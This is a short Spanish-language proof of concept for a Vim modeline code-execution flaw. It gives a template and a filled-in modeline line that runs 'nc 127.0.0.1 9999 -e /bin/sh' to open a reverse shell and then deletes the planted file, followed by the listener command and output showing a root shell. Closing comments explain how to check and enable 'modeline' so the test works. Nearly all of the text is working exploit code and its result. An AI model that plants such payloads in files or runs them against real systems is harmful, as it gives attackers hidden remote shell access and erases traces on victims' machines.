:!nohup nc <ip> <puerto> -e <shell> >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm <nombre del archivo> >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

:!nohup nc 127.0.0.1 9999 -e /bin/sh >> /tmp/nohup.dat 2>> /tmp/nohup.dat & rm poc.txt >> /tmp/nohup.dat 2>> /tmp/nohup.dat||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

nc -vlp 9999

:set modeline

listening on [any] 9999 ... connect to [127.0.0.1] from localhost [127.0.0.1] 42730 whoami root

# Presionamos ":" y colocamos set modeline? # Si nos retorna "modeline" es porque somos vulnerables a este ataque y si no, nos retornaria "nomodeline" # Y si quiero cambiarlo a "modeline" en caso de que nos retorne "modeline", colocamos el siguiente codigo en el archivo de ćonfiguracion de Vim "/etc/vim/vimrc" # set modeline # Y para ver si la prueba es exitosa, realiza el POC y me dices que tal ...

Contribución gracias a DtxdF.